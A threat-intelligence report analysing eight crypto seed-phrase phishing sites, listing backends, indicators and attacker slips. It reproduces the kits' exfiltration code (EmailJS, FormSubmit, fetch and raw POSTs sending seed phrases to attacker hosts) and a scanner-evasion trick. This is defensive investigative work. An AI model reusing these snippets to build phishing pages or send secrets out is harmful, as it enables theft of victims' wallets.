The 8 Sites: Full Breakdown
1
- Live
- Cloudflare Pages
- Telegram Bot + EmailJS
The most sophisticated backend of all 5 — every stolen credential is sent through two independent channels simultaneously:
Victim submits seed phrase
|
+--> Channel 1: axios POST --> Express.js on Render.com
| |
| +--> Telegram Bot API --> @metatech2 (instant DM)
|
+--> Channel 2: fetch POST --> EmailJS API
|
+--> Bestgrace309@gmail.com (email backup)| Indicator | Value |
|---|---|
|
Scammer Email |
Bestgrace309@gmail.com |
|
Telegram Bot |
@DewdropsTG_bot (ID: 7567323692) |
|
Telegram Recipient |
@metatech2 (Chat ID: 7350941887) |
|
Backend |
emailjs-backend-ovtg.onrender.com |
|
EmailJS Service |
service_d5qigxs / template_7bqxeaa |
|
Hidden Domain |
layerschain.in (from CF email obfuscation) |
|
Messages Sent |
1,824+ (from Telegram message_id) |
|
Domain Age |
2 days (TLS: March 25, 2026) |
- OPSEC Failure
The attacker’s email was found in a JavaScript comment inside config.js: // Bestgrace309@gmail.com. They forgot to remove it before deploying. Additionally, the Telegram relay backend is completely open — no authentication, no rate limiting. By decoding Cloudflare’s data-cfemail obfuscation in the HTML, we also uncovered a hidden email: support@layerschain.in, linking to Indian and South African hosting infrastructure.
2
- Live
- Cloudflare Pages
- Un-static Forms
A pixel-perfect scrape of the real Aqualibre (AQLA) token migration page. The HTML contains a metadata tag revealing the source: data-scrapbook-source="https://token.aqla.app/migration", timestamped November 19, 2024.
<form action="https://forms.un-static.com/forms/c78173e2d991...94c3f76">
<textarea name="phrase"></textarea>
<input name="private-key" />
<textarea name="keystore-json"></textarea>
<input name="password" />
</form>- Cost: $0
Cloudflare Pages: free. Un-static Forms: free. No domains purchased. No servers rented. Total infrastructure cost: zero dollars.
3
- Live
- Cloudflare Pages
- Un-static Forms
The subdomain contains “safpal” — a deliberate misspelling of SafePal, a popular hardware wallet. The site poses as “Blockchain Wallet Rectification” with 26 fake issue categories. Uses Typed.js to animate chain names (Ethereum, BSC, Polygon…) and a LiveCoinWatch ticker for credibility.
Uses the exact same phishing template as Site #2: identical connect.html, identical wallets.html with 60+ logos, same Un-static backend (different form ID — 6f1b82c3...da9943af). The identical kit strongly suggests one operator running both sites.
Red flags in the code: “Privay Policy” (missing ‘c’), “seperated” (should be “separated”), “Kestore” (missing ‘y’). Password field uses type="text" instead of type="password".
4
- Live
- Cloudflare Pages
- Dual EmailJS (Redundancy)
A near-perfect clone of the Flare Network portal — a real Layer-1 EVM blockchain with FTSO and Data Connector protocols. Replicates 30+ ecosystem partners, navigation, and branding. Favicons loaded from a typosquat: portal.flaremainet.com (one ‘n’ missing from “mainnet”).
The only site using two separate EmailJS accounts simultaneously for anti-takedown redundancy:
// Channel 1: EmailJS SDK
emailjs.send('service_6dt5h1k', 'template_hjqp9gb', payload)
// Key: Sza6lhzA9hKHrm1k4
// Channel 2: jQuery AJAX direct
$.ajax('https://api.emailjs.com/api/v1.0/email/send', {
data: { service_id: 'service_isy47de',
template_id: 'template_dkk4d1b',
user_id: 'JsVEgXVcaSTro1etu' }
})Email subject for every theft: "New Wallet Details from Flare".
- This Is a Funded Business
The HTML contains Google Tag Manager (GTM-WX2D2TR), Microsoft Clarity (j4bllybjkp), Lunio PPC protection, and a Twitter/X Ads pixel. The attacker is running paid advertising to drive victims to the phishing site and filtering bot clicks. This isn’t a hobby — it’s a funded operation with analytics and ad spend.
5
- Backend Dead
- PulseResolve API (PhaaS)
A generic “COIN NODE” / “Wallet Fix” service (no specific brand). Copyright “Wallet Fix 2022” — this kit template is at least 4 years old. Images hosted on pumpeth.com (WordPress on AWS).
The most alarming backend architecture: a UUID-based multi-tenant API:
POST https://api.pulseresolve.com/a26db20c-1dc4-4208-a60a-c2c3b22c02ef
Content-Type: multipart/form-data
wallet=Metamask&type=phrase&phrase=buddy+surprise+vapor+river+...Each scammer gets their own UUID endpoint. A central operator maintains the API, tracks campaigns, and potentially takes a cut of stolen funds. This is industrialized crypto theft — a Phishing-as-a-Service model.
| Indicator | Value | Status |
|---|---|---|
|
api.pulseresolve.com |
Exfiltration API |
NXDOMAIN |
|
walletissuesfix.net |
Favicon host |
NXDOMAIN |
|
syncwallet.online |
Logo host |
NXDOMAIN |
|
pumpeth.com |
Image CDN |
Live (AWS) |
- Zombie Frontend
The backend is dead, but the frontend is still live on Cloudflare Pages. If the attacker re-registers pulseresolve.com, the site becomes instantly operational again.
6
- Live
- Cloudflare Pages + Replit
- Custom C2 API
- BIP39 Autocomplete
A two-pronged operation: a generic “Support Center” at wallet-support-39n.pages.dev with 15 fake issue categories and 39 wallet brands, plus a pixel-perfect Ledger onboarding clone at ledger-recovery.support hosted on Replit — complete with device model selection, PIN setup, and a 24-word seed phrase grid with real BIP39 autocomplete.
The wallet support page sends stolen data to api.uranustoken.org/log — a custom nginx/Ubuntu C2 behind Cloudflare. The backend intentionally drops all GET requests (returns 522 timeout), responding only to POST. This means URL scanners, Google Safe Browsing crawlers, and security researchers pinging the endpoint with GET see nothing — the C2 appears dead.
// config.js — C2 config exposed in plaintext
const config = {
serverURL: "https://api.uranustoken.org",
allowedWallets: ["phantom","solfare","metamask","trustwallet",
"coinbasewallet","ledger","trezor","okx","sui","backpack",
"tonkeeper","magiceden","slush" /* + 26 more */]
};
window.IWMConfig = config;
// Exfiltration function (deobfuscated from bundle)
function Ae(seedPhrase, passPhrase, walletName) {
fetch(serverURL + "/log", {
method: "POST",
headers: {"Content-Type": "application/json"},
body: JSON.stringify({seedPhrase, passPhrase, walletName, apiKey})
})
}The Ledger clone runs a separate Express.js backend on Replit itself: POST /api/recovery-phrase collecting {deviceId, pin, phrase}. It returns 400 {"error":"Invalid data provided"} on malformed input — confirming the backend is live and actively validating stolen data.
| Indicator | Value |
|---|---|
|
Frontend (Wallet) |
wallet-support-39n.pages.dev |
|
Frontend (Ledger) |
ledger-recovery.support (34.111.179.208) |
|
C2 Backend |
api.uranustoken.org → nginx/1.24.0 Ubuntu |
|
C2 IPs |
104.21.60.163 / 172.67.198.35 (Cloudflare) |
|
Replit Verify |
a43d3852-5304-47af-a61b-f0f6f3912736 |
|
Registrar |
Name.com (ledger-recovery.support) |
|
Deployed |
Jan 9, 2026 (Last-Modified header) |
|
Tech Stack |
React + Vite + Tailwind v4.1 + Framer Motion |
- Highest UX Fidelity
The 466 KB JS bundle contains the full BIP39 wordlist for real-time autocomplete, 67 references to “passphrase”, 39 to “mnemonic”. The Ledger clone walks victims through the exact same onboarding flow as a real Ledger device — the most convincing phishing page in this entire investigation. The apiKey field in the config suggests a multi-tenant PhaaS architecture.
7
- Live
- Cloudflare Pages
- FormSubmit.co
A generic “Decentralized Launchpad” with 21 bait categories (Staking, Migration, KYC, Giveaway, Claim Rewards, Asset Recovery, Pre-sale, Mint NFTs, Locked Accounts…) and 70+ wallet brands — one of the most comprehensive wallet lists we encountered. The telltale typo “Sychronize” (missing ‘n’) betrays the fake.
Uses FormSubmit.co — a legitimate form-to-email service. The endpoint hash a2cf4131f1a5d39453c7c183df96f86f is an MD5 of the scammer’s email address. We brute-forced hundreds of email patterns across Gmail, Yahoo, Hotmail, ProtonMail, Yandex, and Mail.ru — no match. The scammer uses an uncommon or randomly generated email.
// Exfiltration via jQuery AJAX → FormSubmit → scammer email
$.ajax({
url: "https://formsubmit.co/ajax/a2cf4131f1a5d39453c7c183df96f86f",
method: "POST",
dataType: "JSON",
data: {
dappWord: seedPhrase, // THE STOLEN SEED PHRASE
dappName: walletName, // Which wallet was selected
linkName: "DAPP DECENTRALIZED" // Campaign identifier
}
});| Indicator | Value |
|---|---|
|
Domain |
mainnetvalidationapp.pages.dev |
|
FormSubmit Hash |
a2cf4131f1a5d39453c7c183df96f86f |
|
Campaign ID |
DAPP DECENTRALIZED |
|
FontAwesome Kit |
bdc3291137 (kit #112310842, free v6.7.2) |
|
jQuery |
3.2.1 + 3.5.1 loaded simultaneously |
|
Bootstrap |
CSS 5.2.2 + JS 5.3.0-alpha1 (mismatch) |
- Two Tracking Handles
FontAwesome Kit bdc3291137 — FontAwesome can identify the account owner behind this kit ID. The campaign tag DAPP DECENTRALIZED may appear on other phishing sites using the same FormSubmit hash. After stealing the seed phrase, a fake QR code and random 7-character ref code are displayed: “Contact the Admin with your unique ref code” — keeping victims waiting instead of investigating.
8
- Dead
- Cloudflare R2
- PHP + DDNS
Unknown — both the frontend and backend are offline. Based on the payload structure, this was a crypto wallet seed phrase stealer. The Cloudflare R2 public bucket (object storage, not Pages) is a well-documented phishing vector with 5,000+ malicious pages identified and a 61x traffic increase reported by Netskope.
The most primitive operation in this collection. Seed phrases are sent word-by-word to a PHP script running on a home computer or VPS behind free Dynamic DNS:
POST mercifuljigga4real123.publicvm.com/fuc.php
Content-Type: application/x-www-form-urlencoded
pass=Word+1:+finger+%0AWord+2:+flag+%0AWord+3:+across
+%0AWord+4:+admit+%0AWord+5:+weather+%0AWord+6:+fragile
+%0AWord+7:+trick+%0AWord+8:+weekend+%0AWord+9:+gift
+%0AWord+10:+grit+%0AWord+11:+borrow+%0AWord+12:+access| Indicator | Value |
|---|---|
|
Frontend |
pub-519769e9eb634616b1746c2018641d56.r2.dev [OFFLINE] |
|
Backend |
mercifuljigga4real123.publicvm.com [NXDOMAIN] |
|
R2 Bucket ID |
519769e9eb634616b1746c2018641d56 |
|
DDNS Provider |
DNSExit.com / Netdorm, Inc. (Cincinnati, OH) |
|
DNS NS |
ns10–13.dnsexit.com |
|
Username |
mercifuljigga4real123 |
- Username OSINT: mercifuljigga4real123
“Merciful” + “jigga” (Jay-Z’s nickname) + “4real” + “123” — a distinctly personal handle suggesting hip-hop culture affinity. Not found on any indexed platform: GitHub, X, Instagram, TikTok, Reddit, YouTube, Twitch, or Steam. Likely active on Discord, Telegram, or gaming platforms under this name or close variations. The filename fuc.php matches the handle’s irreverent style.
7 Methods of Stealing Your Seed Phrase
| Method | Sites | How It Works | Speed | Cost |
|---|---|---|---|---|
| Telegram Bot | #1 | Express.js on Render.com proxies to Bot API. Scammer gets instant DM with credentials. | Real-time | $0 |
| EmailJS | #1, #4 | Client-side JavaScript sends directly to EmailJS API, which delivers to scammer's email. | ~1 min | $0 |
| Un-static Forms | #2, #3 | Standard HTML form POST to a legitimate form service that forwards submissions via email. | ~1 min | $0 |
| FormSubmit.co | #7 | jQuery AJAX to FormSubmit.co. Email address hidden behind MD5 hash. Campaign tagged as "DAPP DECENTRALIZED". | ~1 min | $0 |
| Custom C2 API | #6 | React SPA sends to nginx/Express API behind Cloudflare. Drops GET requests (522) to evade scanners. Only responds to POST. | Real-time | ~$5/mo |
| PHP + DDNS | #8 | PHP script on a home computer via free Dynamic DNS (publicvm.com). Seed phrase sent word-by-word. | Real-time | $0 |
| PhaaS API | #5 | UUID-based multi-tenant API. Central operator manages backend, scammers rent endpoints. | Real-time | Unknown |